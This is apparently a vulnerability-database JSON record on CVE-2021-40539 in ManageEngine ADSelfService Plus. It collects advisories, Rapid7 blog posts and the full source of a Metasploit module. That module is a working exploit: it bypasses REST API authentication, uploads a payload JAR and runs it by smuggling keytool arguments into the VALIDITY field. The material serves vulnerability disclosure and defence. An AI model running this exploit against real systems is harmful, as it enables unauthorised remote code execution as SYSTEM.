\nSHA-256 | b2a29d99a1657140f4e254221d8666a736160ce960d06557778318e0d1b7423b \n \n \n\nThe post [Threat actor DEV-0322 exploiting ZOHO ManageEngine ADSelfService Plus](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {}, "published": "2021-11-09T00:24:55", "type": "mmpc", "title": "Threat actor DEV-0322 exploiting ZOHO ManageEngine ADSelfService Plus", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-09T00:24:55", "id": "MMPC:B1806E4D7F97F83DB41A41A9BBF86D13", "href": "https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-23T13:18:51", "description": "This Metasploit module exploits CVE-2021-40539, a REST API authentication bypass vulnerability in ManageEngine ADSelfService Plus, to upload a JAR and execute it as the user running ADSelfService Plus - which is SYSTEM if started as a service.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-27T00:00:00", "type": "zdt", "title": "ManageEngine ADSelfService Plus Authentication Bypass / Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-27T00:00:00", "id": "1337DAY-ID-37080", "href": "https://0day.today/exploit/description/37080", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::Java::HTTP::ClassLoader # TODO: Refactor this\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'ManageEngine ADSelfService Plus CVE-2021-40539',\n 'Description' => %q{\n This module exploits CVE-2021-40539, a REST API authentication bypass\n vulnerability in ManageEngine ADSelfService Plus, to upload a JAR and\n execute it as the user running ADSelfService Plus - which is SYSTEM if\n started as a service.\n },\n 'Author' => [\n # Discovered by unknown threat actors\n 'Antoine Cervoise', # Independent analysis and RCE\n 'Wilfried B\u00e9card', # Independent analysis and RCE\n 'mr_me', # keytool classloading technique\n 'wvu' # Initial analysis and module\n ],\n 'References' => [\n ['CVE', '2021-40539'],\n ['URL', 'https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html'],\n ['URL', 'https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis'],\n ['URL', 'https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html'],\n ['URL', 'https://github.com/synacktiv/CVE-2021-40539/blob/main/exploit.py']\n ],\n 'DisclosureDate' => '2021-09-07',\n 'License' => MSF_LICENSE,\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA,\n 'Privileged' => false, # true if ADSelfService Plus is run as a service\n 'Targets' => [\n ['Java Dropper', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8888\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Path traversal for auth bypass', '/./'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'),\n 'vars_post' => {\n 'methodToCall' => 'previewMobLogo'\n }\n )\n\n unless res\n return CheckCode::Unknown('Target failed to respond to check.')\n end\n\n unless res.code == 200 && res.body.match?(%r{mobLogo.*/temp/tempMobPreview\\.jpeg})\n return CheckCode::Safe('Failed to bypass REST API authentication.')\n end\n\n CheckCode::Vulnerable('Successfully bypassed REST API authentication.')\n end\n\n def exploit\n upload_payload_jar\n execute_payload_jar\n end\n\n def upload_payload_jar\n print_status(\"Uploading payload JAR: #{jar_filename}\")\n\n jar = payload.encoded_jar\n jar.add_file(\"#{class_name}.class\", constructor_class) # Hack, tbh\n\n form = Rex::MIME::Message.new\n form.add_part('unspecified', nil, nil, 'form-data; name=\"methodToCall\"')\n form.add_part('yas', nil, nil, 'form-data; name=\"Save\"')\n form.add_part('smartcard', nil, nil, 'form-data; name=\"form\"')\n form.add_part('Add', nil, nil, 'form-data; name=\"operation\"')\n form.add_part(jar.pack, 'application/java-archive', 'binary',\n %(form-data; name=\"CERTIFICATE_PATH\"; filename=\"#{jar_filename}\"))\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'),\n 'ctype' => \"multipart/form-data; boundary=#{form.bound}\",\n 'data' => form.to_s\n )\n\n unless res&.code == 404\n fail_with(Failure::NotVulnerable, 'Failed to upload payload JAR')\n end\n\n # C:\\ManageEngine\\ADSelfService Plus\\bin (working directory)\n register_file_for_cleanup(jar_filename)\n\n print_good('Successfully uploaded payload JAR')\n end\n\n def execute_payload_jar\n print_status('Executing payload JAR')\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/Connection'),\n 'vars_post' => {\n 'methodToCall' => 'openSSLTool',\n 'action' => 'generateCSR',\n # https://docs.oracle.com/javase/8/docs/technotes/tools/unix/keytool.html\n 'VALIDITY' => \"#{rand(1..365)} -providerclass #{class_name} -providerpath #{jar_filename}\"\n }\n )\n\n unless res&.code == 404\n fail_with(Failure::PayloadFailed, 'Failed to execute payload JAR')\n end\n\n print_good('Successfully executed payload JAR')\n end\n\n def jar_filename\n @jar_filename ||= \"#{rand_text_alphanumeric(8..16)}.jar\"\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/37080", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-08-15T19:18:22", "description": "Exploitation code for CVE-2021-40539\n\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T14:49:27", "type": "githubexploit", "title": "Exploit for Improper Authentication in Zohocorp Manageengine Adselfservice Plus", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2022-08-15T15:41:33", "id": "A32F9E91-783B-5C20-9630-6A4E3DDA9AFF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "rapid7blog": [{"lastseen": "2021-11-10T09:08:01", "description": "![Opportunistic Exploitation of Zoho ManageEngine and Sitecore CVEs](https://blog.rapid7.com/content/images/2021/11/GettyImages-1264062184.jpg)\n\nOver the weekend of November 6, 2021, Rapid7\u2019s Incident Response (IR) and Managed Detection and Response (MDR) teams began seeing opportunistic exploitation of two unrelated CVEs:\n\n * CVE-2021-40539, a REST API authentication bypass in Zoho\u2019s ManageEngine ADSelfService Plus product that [Rapid7 has previously analyzed](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis?referrer=blog>). CISA [warned](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus>) of attackers targeting CVE-2021-40539 in September; the vulnerability allows for unauthenticated remote code execution upon successful exploitation. As of November 8, 2021, Microsoft is [also warning](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>) that a specific threat actor is targeting vulnerable ManageEngine ADSelfService Plus installations.\n * CVE-2021-42237, a [deserialization vulnerability](<https://attackerkb.com/topics/g2wzJERRtL/cve-2021-42237/rapid7-analysis?referrer=blog>) in the Sitecore Experience Platform that allows for unauthenticated remote code execution [in earlier versions](<https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776>). The affected versions of Sitecore XP appear to be several years old and unsupported other than through extended support contracts. With that said, there seem to be a higher number of organizations with vulnerable installations than expected based on the rate of compromise Rapid7 teams have observed.\n\nAttackers appear to be targeting vulnerabilities with attacks that drop webshells and install coin miners on vulnerable targets. The majority of the compromises Rapid7\u2019s services teams have seen are the result of vulnerable Sitecore instances. Both CVEs are patched; ManageEngine ADSelfService Plus and Sitecore XP customers should prioritize fixes on an urgent basis, without waiting for regularly scheduled patch cycles.\n\n## Rapid7 customers\n\nThe following attacker behavior detections are available to InsightIDR and MDR customers and will alert security teams to webshells and powershell activity related to this attack:\n\n * Webshell - IIS Spawns CMD to Spawn PowerShell\n * Attacker Technique - PowerShell Download Cradle\n\nInsightVM and Nexpose customers can assess their exposure to Zoho ManageEngine CVE-2021-40539 with a [remote vulnerability check](<https://www.rapid7.com/db/vulnerabilities/zoho-manageengine-adselfservice-plus-cve-2021-40539/>). Rapid7 vulnerability researchers have a full technical analysis of this vulnerability [available here](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis?referrer=blog>). Our research teams are investigating the feasibility of adding a vulnerability check for Sitecore XP CVE-2021-42237. A technical analysis of this vulnerability is [available here](<https://attackerkb.com/topics/g2wzJERRtL/cve-2021-42237/rapid7-analysis?referrer=blog>).\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2021-11-09T16:59:41", "type": "rapid7blog", "title": "Opportunistic Exploitation of Zoho ManageEngine and Sitecore CVEs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40539", "CVE-2021-42237"], "modified": "2021-11-09T16:59:41", "id": "RAPID7BLOG:D84509B01151F59E9152A401D5CF206D", "href": "https://blog.rapid7.com/2021/11/09/opportunistic-exploitation-of-zoho-manageengine-and-sitecore-cves/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-26T19:03:33", "description": "## Self-Service Remote Code Execution\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/11/metasploit-ascii-1-2.png)\n\nThis week, our own [@wvu-r7](<https://github.com/wvu-r7>) added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/15874>) that achieves unauthenticated remote code execution in ManageEngine ADSelfService Plus, a self-service password management and single sign-on solution for Active Directory. This new module leverages a REST API authentication bypass vulnerability identified as [CVE-2021-40539](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539?referrer=blog>), where an error in the REST API URL normalization routine makes it possible to bypass security filters and upload arbitrary files on the target. wvu\u2019s new module simply uploads a Java payload to the target and executes it, granting code execution as SYSTEM if ManageEngine ADSelfService Plus was started as a service.\n\n## Storm Alert\n\nWarning, this is not a drill! A critical unauthenticated command injection vulnerability is approaching the Nimbus service component of Apache Storm and has been given the name [CVE-2021-38294](<https://attackerkb.com/topics/xvmqwPRnm5/cve-2021-38294?referrer=blog>). A new exploit [module](<https://github.com/rapid7/metasploit-framework/pull/15866>) authored by our very own [zeroSteiner](<https://github.com/zeroSteiner>) has landed and will exploit this vulnerability to get you OS command execution as the user that started the Nimbus service. Please, evacuate the area immediately!\n\n## Metasploit Community CTF 2021\n\nWe're happy to announce this year\u2019s CTF will start on Friday, December 3, 2021! Similar to last year, the game has been designed to be accessible to beginners who want to learn and connect with the community. Keep in mind that while a team can have unlimited members, only 1,000 team spots are available, and once they\u2019re gone you will have to join someone else\u2019s team. You can find the full details in our [blog post](<https://www.rapid7.com/blog/post/2021/11/16/announcing-the-2021-metasploit-community-ctf/>).\n\n## New module content (2)\n\n * [Apache Storm Nimbus getTopologyHistory Unauthenticated Command Execution](<https://github.com/rapid7/metasploit-framework/pull/15866>) by [Alvaro Mu\u00f1oz](<https://github.com/pwntester>) and [Spencer McIntyre](<https://github.com/zeroSteiner>), which exploits [CVE-2021-38294](<https://attackerkb.com/topics/xvmqwPRnm5/cve-2021-38294?referrer=blog>) \\- This adds an exploit for CVE-2021-38294 which is an unauthenticated remote command execution vulnerability within the `getTopologyHistory()` RPC method that is provided by the Nimbus service which is a component of the Apache Storm project. In order to be exploitable, at least one topology must have been submitted to the Storm cluster. It may be active or inactive but one must be present.\n * [ManageEngine ADSelfService Plus CVE-2021-40539](<https://github.com/rapid7/metasploit-framework/pull/15874>) by [wvu](<https://github.com/wvu-r7>), [Antoine Cervoise](<https://github.com/cervoise>), [Wilfried B\u00e9card](<https://github.com/wilfried-becard>), and [mr_me](<https://github.com/stevenseeley>), which exploits [CVE-2021-40539](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539?referrer=blog>) \\- This adds an exploit for CVE-2021-40539 which is an unauthenticated RCE within the ManageEngine ADSelfService application.\n\n## Enhancements and features\n\n * [#15887](<https://github.com/rapid7/metasploit-framework/pull/15887>) from [smashery](<https://github.com/smashery>) \\- The path expansion code has been expanded to support path-based tab completion. Users should now tab-complete things such as `cat ~/some_filenam<tab>`.\n * [#15889](<https://github.com/rapid7/metasploit-framework/pull/15889>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- An update has been made to library code so that terminal resize events are only sent if the Meterpreter client supports it. Additionally, extra feedback is now provided to users on whether or not terminal resizing is handled automatically or if they should adjust it manually.\n * [#15898](<https://github.com/rapid7/metasploit-framework/pull/15898>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- Ruby 3.x removes support for `URI.encode` and `URI.escape`. This PR replaces uses of these functions in modules with calls to `URI::DEFAULT_PARSER.escape` so that Ruby 3 can run these modules instead of raising errors about missing functions.\n * [#15899](<https://github.com/rapid7/metasploit-framework/pull/15899>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- This improves the user experience when `shell` is invoked from a Meterpreter session. Now, when the `fully_interactive_shells` feature is enabled, a message is displayed to inform the operator that a fully interactive TTY is supported. Note that you can start it by invoking `shell -it`.\n\n## Bugs fixed\n\n * [#15864](<https://github.com/rapid7/metasploit-framework/pull/15864>) from [timwr](<https://github.com/timwr>) \\- A bug has been fixed whereby the `sessions -u` command would not return a x64 Meterpreter session on a x64 Windows host, and would instead return a x86 session. This issue has now been addressed so that `sessions -u` will determine the architecture of the target host prior to upgrading and will generate a new Meterpreter session of the appropriate architecture.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.15...6.1.16](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-11-17T15%3A27%3A48-06%3A00..2021-11-24T18%3A00%3A22-06%3A00%22>)\n * [Full diff 6.1.15...6.1.16](<https://github.com/rapid7/metasploit-framework/compare/6.1.15...6.1.16>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-26T17:21:03", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38294", "CVE-2021-40539"], "modified": "2021-11-26T17:21:03", "id": "RAPID7BLOG:DB7AC7E9278AED114B1BBA8DC96DD124", "href": "https://blog.rapid7.com/2021/11/26/metasploit-wrap-up-140/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-18T15:27:57", "description": "![What's New in InsightVM and Nexpose: Q4 2021 in Review](https://blog.rapid7.com/content/images/2022/02/insightvm-q4.jpg)\n\nGreetings, fellow security professionals. As we enter into the new year, we wanted to provide a recap of product releases and features on the vulnerability management (VM) front for Q4 2021.\n\nLet's start by talking about the elephant in the room. The end of last year was dominated by [Log4Shell](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>), the once-in-a-generation security vulnerability that impacted nearly every corner of the security industry and completely ruined every holiday party we were invited to. But as you will see below, in addition to providing you with strong Log4Shell coverage, our VM team has been hard at work on multitudes of other features and capabilities as well.\n\nChief among these are improvements to credential management aspects of scanning, in the form of Scan Assistant, and better Credential Status Reporting. Container scanning is also seeing improved integration of results, as well as enhanced checks leveraging Snyk. Last but not least, email distribution of reports will allow you to better communicate findings across the organization. In other words, Q4 was more than Log4Shell over here, and we're excited to tell you about it.\n\n(Note: Starting this edition, you will see up front a label of [InsightVM] vs [InsightVM & Nexpose] to clarify which product a new feature or capability pertains to)\n\n## [InsightVM & Nexpose] Log4j security content\n\nWhen Log4j hit in early December, our VM teams went into high gear offering solutions and boosting ways InsightVM can identify vulnerable software. Here's a recap of our current [coverage](<https://docs.rapid7.com/insightvm/apache-log4j>):\n\n * Authenticated, generic JAR-based coverage for Windows, macOS, and Unix-like operating systems\n * [Mitigation checks](<https://www.rapid7.com/db/vulnerabilities/apache-log4j-core-jndilookup-mitigated/>) for macOS and Unix-like operating systems\n * Remote check for vulnerable HTTP(S) applications\n * Package-based checks for supported Linux distributions\n * [Coverage](<https://www.rapid7.com/db/vulnerabilities/vcenter-log4j-CVE-2021-44228/>) and [mitigation](<https://www.rapid7.com/db/vulnerabilities/vcenter-log4j-core-vmsa-2021-0028-9-mitigated/>) checks for CVE-2021-44228 and CVE-2021-45046 affecting VMware vCenter Appliances\n * We also added IVM checks to assess CVE-2021-45046 on [VMware Horizon Connection Server](<https://www.rapid7.com/db/vulnerabilities/vmware-horizon-connection-server-cve-2021-45046/>) and [Horizon Agent](<https://www.rapid7.com/db/vulnerabilities/vmware-horizon-agent-cve-2021-45046/>)\n * Authenticated JAR-based checks for follow-on CVEs (CVE-2021-45046, CVE-2021-45105, CVE-2021-44832)\n\n## [InsightVM] Log4j dashboard and Query Builder\n\nWe added a log4j Query Builder query to the Helpful Queries section of Query Builder and a new dashboard template (the Specific Vulnerability Dashboard) designed to allow customers to visualize the impact of a specific vulnerability or vulnerabilities to their environment.\n\n![What's New in InsightVM and Nexpose: Q4 2021 in Review](https://blog.rapid7.com/content/images/2022/02/Screen-Shot-2022-02-15-at-3.46.02-PM.png)\n\nWe have a TON of additional Log4j resources here for you to check out:\n\n * A [blog ](<https://www.rapid7.com/blog/post/2021/12/14/using-insightvm-to-find-apache-log4j-cve-2021-44228/>)from our product manager Greg Wiseman that gives some great context on using InsightVM to detect Log4j\n * A [customer resource hub](<https://www.rapid7.com/log4j-cve-2021-44228-customer-resources/>) on how various Rapid7 products help you defend against Log4j\n * A [general public resource hub](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>) on background info about this extraordinary new vulnerability\n\n## [InsightVM & Nexpose] Additional vulnerability checks and content (non-Log4Shell)\n\nBelieve it or not, the world has seen other vulns beyond Log4j. As a team, we added nearly 4,000 vulnerability checks to InsightVM and Nexpose in Q4 and more than a few that warrant mentioning here.\n\n * Zoho's ManageEngine portfolio was affected by critical unauthenticated remote code execution vulnerabilities in [ServiceDesk Plus](<https://www.rapid7.com/db/vulnerabilities/zoho-manageengine-servicedesk-plus-cve-2021-44077/>) and [Desktop Central](<https://www.rapid7.com/db/vulnerabilities/http-manageengine-dc-cve-2021-44515/>)\n * We also saw [opportunistic exploitation](<https://www.rapid7.com/blog/post/2021/11/09/opportunistic-exploitation-of-zoho-manageengine-and-sitecore-cves/>) of [CVE-2021-42237](<https://www.rapid7.com/db/vulnerabilities/sitecore-experience-platform-cve-2021-42237/>), an insecure deserialization vulnerability in the SiteCore Experience Platform\n * The open-source CI/CD solution GoCD was hit by [CVE-2021-43287](<https://www.rapid7.com/db/vulnerabilities/http-gocd-cve-2021-43287/>), allowing unauthenticated attackers to leak configuration information, including build secrets and encryption keys, with a single HTTP request\n\nIf you want to learn more about these and many other threats that materialized during Q4, check out our [Emergent Threat Response](<https://www.rapid7.com/blog/tag/emergent-threat-response/>) blogs (you should check those out regularly, because we are constantly and consistently writing about new threats in near real-time).\n\n## [InsightVM & Nexpose] Introducing Scan Assistant\n\nCredential management for Scan Engine can be a huge burden on vulnerability management teams, especially when you are managing tens of thousands of devices. That's why we created Scan Assistant to help ease that burden.\n\nScan Assistant is a lightweight service that can be installed on each targeted scan. It allows you to scan targets without the need for credentials. When the Scan Engine scans a target with the Scan Assistant attached, it will automatically collect the information it needs to access the target without the need for additional scan credentials. In addition to enhanced security, Scan Assistant improves scan performance for vulnerability and policy scans, has a fully on-premise footprint, works with both InsightVM and Nexpose, and is completely idle until engaged by a scan. Scan Assistant has now GA'ed for Windows environment. We'll have coverage for other OSes to follow in the future.\n\nAnd, as usual, you can learn so much more [here](<https://www.rapid7.com/blog/post/2021/10/18/passwordless-network-scanning-same-insights-less-risk/>).\n\n![What's New in InsightVM and Nexpose: Q4 2021 in Review](https://blog.rapid7.com/content/images/2022/02/Untitled--38-.png)\n\n## [InsightVM & Nexpose] NEW - Scan diagnostic checks for Credential Status Reporting\n\nWhile we're on the subject of credentials during scans, every so often the scan engine can return a partial or total credential failure that might leave you scratching your head. With this new feature, InsightVM and Nexpose offer scan diagnostic checks that allow you to have more granular visibility into credential success (or lack thereof). This will allow you to better troubleshoot authenticated scans that return results you did not expect.\n\nResults are written as vulnerability checks, giving you the ability to use aspects of the platform's functionality that you are already familiar with to assess where things went wrong.\n\n![What's New in InsightVM and Nexpose: Q4 2021 in Review](https://blog.rapid7.com/content/images/2022/02/pasted-image-0--31-.png)\n\n## [InsightVM] Container Image Scanner integration, additional container software library package checks, improved container scan results integration, and emailed reports\n\nWe are always looking for ways to make your life easier, and these three new improvements to the InsightVM platform are designed to do just that. First, we enhanced the Container Image Scanner to record and post results to InsightVM rather than just to the developer's local machine where the container lives. This allows the organization to better monitor the security of containers under development. Take a look for yourself \u2014 it's in the Builds tab of the Contain Security Section.\n\nWe've also launched a fingerprinter for .Net NuGet and Ruby Gem Packages. This allows us to check for vulnerabilities in these software packages leveraging the Snyk integration. This brings our support for Snyk security content to include Java Maven, Node NPM (Javascript), Python PIP, and now .Net NuGet Ruby Gem packages.\n\n![What's New in InsightVM and Nexpose: Q4 2021 in Review](https://blog.rapid7.com/content/images/2022/02/dotnetvuln.png)\n\nFinally, we're making it easier to share findings across your organization by allowing reports to be sent via email. The entire message includes a password-protected and encrypted pdf and recipients receive a password in a separate email to ensure the info remains secure.\n\n![What's New in InsightVM and Nexpose: Q4 2021 in Review](https://blog.rapid7.com/content/images/2022/02/Screen-Shot-2022-02-15-at-4.00.05-PM.png)\n\nQ4 was a trying time for everyone in the security sphere, and we know that our work on that front is far from done. We hope that some or all of these new InsightVM and Nexpose features make Q1 2022 and beyond a little easier, less stressful, and ultimately more secure. Stay strong!\n\n_**Additional reading:**_\n\n * _[Log4Shell 2 Months Later: Security Strategies for the Internet's New Normal](<https://www.rapid7.com/blog/post/2022/02/17/log4shell-2-months-later-security-strategies-for-the-internets-new-normal/>)_\n * _[Log4Shell Strategic Response: 5 Practices for Vulnerability Management at Scale](<https://www.rapid7.com/blog/post/2022/01/07/log4shell-strategic-response-5-practices-for-vulnerability-management-at-scale/>)_\n * _[Distribute Reports to Email Addresses in InsightVM](<https://www.rapid7.com/blog/post/2021/11/17/distribute-reports-to-email-addresses-in-insightvm/>)_\n * _[InsightVM Scan Diagnostics: Troubleshooting Credential Issues for Authenticated Scanning](<https://www.rapid7.com/blog/post/2021/11/03/insightvm-scan-diagnostics-troubleshooting-credential-issues-for-authenticated-scanning/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-18T14:20:00", "type": "rapid7blog", "title": "What's New in InsightVM and Nexpose: Q4 2021 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42237", "CVE-2021-43287", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-18T14:20:00", "id": "RAPID7BLOG:AB5C0BC130F45073226CC41D25680EA0", "href": "https://blog.rapid7.com/2022/02/18/whats-new-in-insightvm-and-nexpose-q4-2021-in-review/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-08T15:44:47", "description": "![What's New in InsightVM: Q3 2021 in Review](https://blog.rapid7.com/content/images/2021/10/insightvm-q3.jpg)\n\nIn today's post, we're giving a rundown of new features and functionality launched in Q3 2021 for [InsightVM](<https://www.rapid7.com/products/insightvm/>) and the [Insight Platform](<https://www.rapid7.com/products/insight-platform/>). We hope you can begin to leverage these changes to drive success across your organization.\n\n## Apple Silicon support on the Insight Agent\n\nWe're excited to announce that the Insight Agent now natively supports Apple Silicon chips!\n\nApple announced the first generation Apple Silicon chip \u2014 the M1 processor \u2014 in November 2020. This chip is the new standard on all MacBooks starting with the 2020 releases, and Apple plans to transition completely to Apple Silicon chips over the next two years.\n\nThe new Mac installer specifically designed for the Apple Silicon can be accessed right from Agent Management in the platform, in the download section. Learn more in our [Apple Silicon Agent Support blog post](<https://www.rapid7.com/blog/post/2021/07/08/apple-m1-support-on-insight-agent/>).\n\n![What's New in InsightVM: Q3 2021 in Review](https://blog.rapid7.com/content/images/2021/10/vm-screenshot-1.png)\n\n## Asset and Vulnerability Details reports\n\nThis new feature allows you to easily communicate details of your assets and vulnerabilities with stakeholders in a PDF format. Simply click the ****Export to PDF ****button on the Vulnerability Details page, and you'll have a PDF ready to share!\n\n![What's New in InsightVM: Q3 2021 in Review](https://blog.rapid7.com/content/images/2021/10/vm-screenshot-2.png)\n\nThis is particularly useful if you're attempting to collaborate while remediating a specific vulnerability. We'll use a hypothetical security engineer named Jane to illustrate this.\n\nJane recently read about a new ransomware strain that leverages a specific 